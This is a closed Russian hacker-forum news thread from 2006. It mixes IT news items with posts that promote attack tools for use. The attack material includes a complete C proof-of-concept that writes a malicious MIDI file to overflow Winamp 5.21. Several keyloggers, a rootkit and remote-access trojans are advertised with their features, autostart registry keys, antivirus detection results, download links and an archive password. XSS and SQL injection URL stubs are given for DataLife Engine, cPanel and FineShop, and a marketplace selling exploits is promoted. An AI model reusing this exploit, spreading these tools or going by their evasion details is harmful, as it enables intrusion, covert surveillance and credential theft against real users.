Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Отслеживать
domen0ol.jpg
Правила регистрации доменов изменились: теперь для регистрации домена второго уровня в зоне RU не нужно предъявлять паспорт.

С 1 июня этого года изменились правила регистрации доменов — отменена проверка паспортных данных при заключении договора о регистрации домена в соответствии со статьей 435 ГК РФ на основании договора оферты. Регистраторы восприняли [New$paN] долгожданное нововведение с энтузиазмом. «Случилось то, к чему мы так долго шли, — комментирует для CNews Александр Панов, гендиректор компании „Гарант Парк Телеком“ (регистратора „R01“). — Теперь для регистрации домена второго уровня в домене RU не нужно ехать в офис компании-регистратора и заключать договор о регистрации домена в письменной форме. Достаточно зайти в интернет, вбить свои данные, оплатить счет любым доступным способом — и домен твой. Никакой бумажной волокиты и поездки с предъявлением паспорта».

По словам г-на Панова, «беспаспортная» процедура регистрации домена обсуждалась на правлении координационного центра национального домена уже давно. И с 1 июня в числе первых «Гарант Парк Телеком» реально начал регистрировать домены в том числе и по договору оферты. «Уверен, что упрощение процедуры регистрации увеличит количество частных клиентов, и за этот год количество доменов в зоне RU резко увеличится, — продолжает Александр Панов. — Если в прошлом году прирост доменов в зоне RU составил 25%, то в этом ожидается 35–40%. Такими темпами через пару лет мы будем праздновать миллионный домен в национальной зоне».

Тем не менее, предъявить паспорт все же потребуется, например, для передачи домена другому регистратору. Или же для передачи права администрирования домена другому лицу, для изменения сведений, идентифицирующих администраторов, для аннулирования регистрации. Также вводятся санкции в случае поступления информации о недостоверности предоставленных данных. «Так что настоятельно рекомендуем внимательно проверять все предоставляемые данные при регистрации домена», — предостерегает гендиректор «Гарант Парк Телеком».

В от время как в России процесс регистрации доменов упростился, в США происходит обратное. Ходят слухи, что американские конгрессмены начинают задумываться, не принять ли закон, обязывающий органы регистрации проверять сообщаемые при подаче заявки данные. Ведь сегодня любой человек из любой точки мира может зарегистрировать на себя огромное количество доменов, не указывая своего настоящего имени. Конечно, имена и контактные телефоны указывать приходится, но на самом деле их никто не проверяет. Поэтому в Сети безнаказанно процветают и детская порнография, и прочие незаконные вещи. Тем не менее, пока дальше идеи в Штатах дело так и не продвинулось.

Однако, как считают в «Гарант Парк Телекоме», говорить о том, что Россия приходит к тому, от чего другие уже начинают отказываться, не совсем верно. «Скорее, Россия повторяет путь, пройденный на Западе несколько лет назад. Сначала проверка документов, потом отмена проверки документов, потом введение ЭЦП и других электронных средств идентификации пользователя», — говорит г-н Панов.
 
Админы ICQ взбесились!
Код: 
Удаляют номера ICQ 544444 : aim:0008 : Deleted account
все 10*** стёрли
Походу вычищают админо асечных магазинов. странно что именно чётко отстреливают салеров.[New$paN]
Также все удалённые номера ищуться в поиске
P.S.когда начали удалять в израеле как раз начался рабочий день. И чёто тока на руских пока наезжают.
Либо админы буянят либо турки нашли багу и начали баловаться.
 
Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC
Описание:
Уязвимость позволяет захватить полный контроль над удаленной машиной за счет некорректной обработки заголовка midi-файла.
Эксплоит:[New$paN]
Код: 
/*
 
 * ********************************************** *
 * Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
 * ********************************************** *
 * PoC coded by: BassReFLeX                       *
 * Date: 19 Jun 2006                              *
 * ********************************************** *
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "\x4D\x54\x68\x64\x00\x00"
                "\x00\x06\x00\x00\x00\x01"
                "\x00\x60\x4D\x54\x72\x6B"
                "\x00\x00";

char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
   "\xFF\xFF\xFF\xFF\xFF\xFF";
    
     
     
int main(int argc,char* argv[])
{
    system("cls");
    printf("\n* ********************************************** *");
    printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
    printf("\n* ********************************************** *");
    printf("\n* PoC coded by: BassReFLeX                       *");
    printf("\n* Date: 19 Jun 2006                              *");
    printf("\n* ********************************************** *");
    
    if ( argc!=2 )
    {
        usage(argv[0]);
    }
    
    FILE *f;
    f = fopen(argv[1],"w");
    if ( !f )
    {
        printf("\nFile couldn't open!");
        exit(1);
    }
    
                        
    printf("\n\nWriting crafted .mid file...");
    fwrite(header,1,sizeof(header),f);
    fwrite(badc0de,1,sizeof(badc0de),f);
    printf("\nFile created successfully!");
    printf("\nFile: %s",argv[1]);
    return 0;
}        

void usage(char* file)
{
    printf("\n\n");
    printf("\n%s <Filename>",file);
    printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
    exit(1);
}
 
Эксперты по информационной безопасности сообщают об обнаружении троянской программы в Google Pages, веб-сайте хостингового сервиса поискового гиганта.

Вредоносный код был загружен на сервер Googlepages.com, считает Дан Хаббард, руководитель исследований по безопасности из Websense Security Labs.

Троян ведет себя на зараженном компьютере скрытно, а при заходе на банковские сайты активизируется и крадет индивидуальную информацию путем клавиатурного шпионажа.

Пока в Websense не поступало сообщений о распространении в интернете писем и мгновенных сообщений с ссылками на инфицированные веб-страницы.
В Google обещали справится с проблемой максимально быстро.

Источник: CNews.ru
 
ProKeylogger 1.0.0 (Trojan-Spy.Win32.ProKeylogger.10)
Довольно неплохой кейлогер. скриншоты и описание ниже.
Интерефейс
:screenshot: Скриншот|Screenshot
настройки
:screenshot: Скриншот|Screenshot
Remote Installer
:screenshot: Скриншот|Screenshot
и Remote Station
:screenshot: Скриншот|Screenshot
вот его функции:
Track keystrokes, websites, applications, clipboard, passwords, URLS
EMAIL, FTP and IP log delivery

Record Storage Passwords
Remote IP Station (receive logs via IP)
Tiny Remote Key logger's size
Melting option
Warning message option
Uninstall the Remote Key logger Server with a hotkey and after a day interval
Encrypted logs
Send logs after reaching a size or after a hour interval
Firewall bypass options
Local logs retrieving with a friendly calendar
Save logs as html and rtf format

Log Instant Messengers Conversations
Серверная часть состоит из следующих файлов:
c:\WINDOWS\@@@\LHOURS.DAT Размером 1 байт
c:\WINDOWS\@@@\start.exe Размером 282,810 байт
c:\WINDOWS\@@@\utils.dll Размером 217,088 байт
c:\WINDOWS\@@@\WINLOG.EXE Размером 282,810 байт
Для автоматического запуска создается следующий ключ реестра:
Код: 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515} "StubPath"
data: C:\WINDOWS\@@@\start.exe

Видео по использованию кейлоггера
и HELP по нему.
:zns5: Скачать|Download
 
DataLife Engine - SQL Injection
Дата Выпуска: 2006-06-22
Уровень: Умеренно критический
Воздействие: Манипуляция данными
Решение: Неисправленно
Software: DataLife Engine 4.x

Описание:
Уязвимость может эксплуатироваться, чтобы управлять запросами SQL
Пример:
Код: 
http://[host]/index.php?Subaction=userinfo*user=
[New$paN]
 
IntoXonia 0.1 RC2
Руткит от нашего отечественного разработчика (ман тоже на русском). Возможности:

(*) скрытие файлов/каталогов
(*) скрытие процессов
(*) имитация полного удаления файлов
(*) перенаправление обращения к файлам
(*) перенаправление входа в директории
(*) запрет на обращение к файлам
(*) запрет на вход в каталог
(*) добавление фиктивной строки в файл
(*) скрытие строки из файла
(*) замена строк в файле при чтении
(*) защита файла от удаления
(*) сохранение файла при удалении
(*) защита процессов
(*) создание алиасов для команд
(*) перенаправление запуска бинарников
(*) запрет на запуск программ
(*) запись всех нажатых клавиш (кейлоггер)
(*) сниффер POP3/FTP паролей
(*) сохранение настроек в файл
(*) загрузка настроек из файла
(*) получение прав root
(*) смена uid/gid процесса
(*) защищенное удаление файлов
(*) настройка с помощью фиктивного бинарника
(*) защита всех настроек паролем[New$paN]
:zns5: Скачать|Download
Источник: web-hack.ru
 
Professional C# 2005
Еще один комплект для любителей языка C#. Комплект поможет Вам научиться кодить под .NET на С#. Пак содержит все для работы с базами данных, динамическими веб страницами, графикой и многое многое другое. Пак на НОЧИЧКА не расчитан. Считается, что Вы должны кодить на олдном из высокоуровневых языков.[New$paN]
:zns5: Скачать|Download
 
Журнал CNews — деловое издание, ориентированное на руководителей ИТ-департаментов и специалистов в области высоких технологий. Отличительной особенностью журнала является его акцент на вертикальные рынки, потребляющие информационные технологии. Каждый номер содержит основные материалы ежегодных отраслевых обзоров, подготовленных экспертами CNews Analytics. Кроме того, журнал включает разделы, посвященные рынкам корпоративного ПО и аппаратных средств, статьи о проблемах отрасли связи и тесты потребительских цифровых устройств, а также практические руководства по использованию современных цифровых устройств. Особое внимание в журнале уделяется комментариям влиятельных экспертов, представителей компаний-лидеров на ИКТ-рынке в России и в мире.
Бесплатную подписку можно оформить тут
:zns3: Пароль: int06 :zns3: Логин: int06
Источник: web-hack.ru[New$paN]
 
Проект для продавцов
Наткнулся на замечательный проект для продавцов. Причем на проекте нет барыг кидал и прочих отдельных личностей. Вот что говорят о себе авторы проекта:

Проект Buy-Sale.IN - это сервис для тех, кто ищет и предоставляет услуги в сети Интернет. Здесь Вы можете выбрать подходящее Вам предложение из уже имеющихся, или разместить свое объявление о покупке/продаже. В этом случае Вы должны учитывать, что все объявления на проекте Buy-Sale.IN соответствуют следующим областям и сферам деятельности:
- покупка/продажа хостинга/доменов/серверов и т.п.
- написание скриптов/программ
- покупка/продажа сплоитов
- услуги по массовой рассылке объявлений/сообщений/писем и т.п.
- загрузки/траф и т.п.
- и другие подобные объявления
Подробности далее>>[New$paN]
Проект создан, прежде всего, для Вашего удобства - теперь Вам не придется просматривать множество подобных ресурсов в поисках нужного товара или услуги - на Buy-Sale.IN все объявления в одном месте! А значит, и Ваше не останется незамеченным. Удачи Вам в Вашем бизнесе!

Если вы обнаружите нехороших личностей, торгующих не своим товаром ( барыг ), или просто кидал. Просьба НЕМЕДЛЕННО сообщить об этом администрации!!! Они будут удалены из нашей базы и добавлены в базу кидал ( http://kidala.info ).
 
Новый раздел форума - Фишинг и мошенничество в сети
Наконец стал доступен для простой публики данный раздел. К сожалению, все мысли, которые я хотел осуществить из-за сессии куда-то делись (записывать надо). Так что по мере поступления будем постить. Раздел посвящен различным видам социальной инженерии, искусству обмана (но не кидалова!).
В разделе можно делиться личным опытом, главное помните: Кидок и Соц инженерия - разные вещи. Раздел сделан для того, чтобы Вы не попались на подобные ловушки.
В раздел требуется модератор (на момент поста требовался). Желательно из текущего стаффа.[New$paN]
 
logo.gif

Всем известно, что с 1 июля вводится в действие новый закон, запрещающий взымать бабки за входящие звонки. Ну так вот в отместку 3 крупнейших оператора: Биллайн, МТС и Мегафон решили повысить тарифы на исходящие звонки второе. Таким образом многие сети с малой абонентской базой мгновенно становятся неконкурентноспособными и лишаться своих клиентов, так как звонки в сети Могучей Трояки останутся по прежней цене.
Предлагается 1 июля отключить свою мобилу на день. Эта акция лишит операторов огромного дохода, что пошатнется на ее бюджете. Отключи свой телефон и возможно, цены снова понизят.[New$paN]
 
cPanel - XSS
Дата уязвимости: 2006-06-27
Воздействие: Cross Site Scripting
Software: cPanel 10.x
Решение: Неисправлено
Описание:
Уязвимость позволяет провести XSS атаку.
Пример:
Код: 
http://[host]:2082/frontend/x/files/select.html?dir=/&file=
 
Sharp Ps 3.1
:screenshot: Скриншот|Screenshot
Многофункциональный Троян, написанн на Visual Basic, человеком с ником
Durrari.
Серверная часть состоит из одного файла
c:\WINDOWS\system32\regsvr.exe
размер: 23.187 байт.
Для авто-запуска создается следующий ключ реестра:
Код: 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "regsvr"
data: C:\WINDOWS\System32\regsvr.exe
Закачка далее>>[New$paN]
:zns5: Скачать|Download
 
banner_toplogo.jpg

Во вторник Microsoft официально открыла веб-сайт, на котором будет делиться своим кодом с разработчиками.

Сайт CodePlex станет средством предоставления программистам инструментов, доступных по лицензиям Microsoft Shared Source, которые позволяют знакомиться с исходным кодом программных продуктов. [New$paN]

Сайт, до сих порт проходивший бета-тестирование, должен способствовать упрощению обмена технической информацией и программным обеспечением между Microsoft и программистами. В числе уже присутствующих на нем популярных продуктов Microsoft Atlas Control Toolkit и Iron Python beta 1.

Открытие сайта для обмена кодом — один из нескольких шагов, предпринимаемых Microsoft для того, чтобы приспособиться к растущей популярности открытого ПО и методов разработки open source.

П редоставляя доступ к исходному коду своих инструментов, поставщики ПО надеются привлечь разработчиков к собственным продуктам в надежде, что когда те их освоят, они приобретут более функциональную версию или купят поддержку.

CodePlex построен на базе продукта Microsoft для коллективной разработки ПО, называемого Visual Studio 2005 Team Foundation Server.
Источник: Martin LaMonica
 
Crossbow RAT v1.0
Довольно не плохой и свежий троян(06/14/2006).
написан на Visual Basic 6, человеком с ником MarjinZ
Размер: 1,08 MB
Ознакомиться с его возможностями и скачать можно ниже.[New$paN]
его функции:
- Online keylogger
- Computer information with a wide variety of information
- Web Downloader
- Script editor for BAT, no need for uploading files
- Remote shell
- Process Killer
- Shutdown computer with log off, shutdown and restart
- Message box
- Chat
- Clipboard manager
- Disable/Enable AW/FW
- Ballontip or sound notification

фунции сервера:
- Possibility for creating reverse connection servers
- Fake error message on execution
- Hidden Startup key
- Server is hidden
- Encrypted information in Server
- Password protected server
- Server is able to kill system restore points, AV/FW and SP2 SecurityCenter
- Server is able to be packed

так же здесь присутсвуют и "юморные" функции: =)
- Crazy Mouse
- Flip Screen
- Open CD-Tray
- Play sound from web
- Swap Mouse
- Hide desktop
- Hide clock
- Disable WinXP SecurityCenter
- Disable Taskmanager, CMD, Regedit and MSconfig
- Lock System
- Activate monitor

:zns5: Скачать|Download
пасс: damagelab
 
TroMessenger 1.2
:screenshot: Скриншот|Screenshot - настройка сервера
:screenshot: Скриншот|Screenshot - как происходит "общение"
Хороший троян. Написан нашими иранскими друзьями на делфях. =) более ранние версии можно наблюдать здесь
Принцип его работы остался тем же самым, через Yahoo! Messenger.[New$paN]
к сожаленю он палиться вот результаты сканирования на вирустотал:
AntiVir 6.35.0.19 06.30.2006 BDS/Agent.XF.21
Authentium 4.93.8 06.29.2006 W32/Backdoor.KWD
Avast 4.7.844.0 06.29.2006 no virus found
AVG 386 06.29.2006 BackDoor.Agent.BHX
BitDefender 7.2 06.30.2006 Backdoor.Agent.XF
CAT-QuickHeal 8.00 06.29.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 06.29.2006 Trojan.Agent-418
DrWeb 4.33 06.30.2006 BackDoor.Devilz
eTrust-InoculateIT 23.72.53 06.30.2006 no virus found
eTrust-Vet 12.6.2283 06.30.2006 no virus found
Ewido 3.5 06.29.2006 Backdoor.Agent.xf
Fortinet 2.77.0.0 06.30.2006 W32/Packed.B!tr
F-Prot 3.16f 06.29.2006 security risk named W32/Backdoor.KWD
Ikarus 0.2.65.0 06.29.2006 BackDoor.Win32.Devilz
Kaspersky 4.0.2.24 06.30.2006 Backdoor.Win32.Agent.xf
McAfee 4796 06.29.2006 Generic packed
Microsoft 1.1481 06.29.2006 no virus found
NOD32v2 1.1633 06.29.2006 Win32/Agent.XF
Norman 5.90.21 06.29.2006 W32/Agent.ABHH
Panda 9.0.0.4 06.29.2006 Bck/Devang.C
Sophos 4.07.0 06.30.2006 Troj/Agent-BPE
Symantec 8.0 06.30.2006 no virus found
TheHacker 5.9.8.166 06.28.2006 no virus found
UNA 1.83 06.28.2006 Backdoor.Agent
VBA32 3.11.0 06.29.2006 BackDoor.Devilz
VirusBuster 4.3.7:9 06.29.2006 Backdoor.Agent.DDJ

серверная часть состоит из трёх файлов.
c:\WINDOWS\WinMsgLoader.exe
c:\WINDOWS\system32\LoginCMD.exe
c:\WINDOWS\system32\YMSG12ENCRYPT.dll
WinMsgLoader.exe - 310,272 байт
LoginCMD.exe - 6,144 байт
YMSG12ENCRYPT.dll - 46,080 байт

Для автозапуска он создаёт следующий ключ реестра:
Код: 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "WinMsgLoader" 
data: C:\WINDOWS\WinMsgLoader.exe
с его помощью можно:
- просматривать файлы и папки
- Делать скриншоты
- баловаться с СД ромом
- Закачаивайть файлы на заражённый комп и запускать их
- И соответсвенно скачаивать с заражённого компа файлы на ваш компьютер
Более подробно ознакомится с его возможносятми можно скачав архив с ним.
:zns5: Скачать|Download

спасибо мр. N3x^0r'у
 
FineShop - XSS and SQL Inj
Дата: 2006-06-30
Уровень: умерено критический
Решение: Неисправлено
Software: FineShop

Описание:
1. Уязвимость позволяет провести XSS атаку
пример:
Код: 
http://[host]index.php?id_produc=
http://[host]index.php?promocja=
http://[host]index.php?wysw=
2. Уязвимость позволяет провести SQL Inj
Пример:
Код: 
http://[host]index.php?id_produc
http://[host]index.php?id_kat
http://[host]index.php?produkt
 
logo_right.png


Вышла финальная версия утилиты для администрирования MySQL через web-интерфейс, написанная на PHP - phpMyAdmin 2.8.2 Final

:zns5: Скачать|Download
 
Статус
Закрыто для дальнейших ответов.
Верх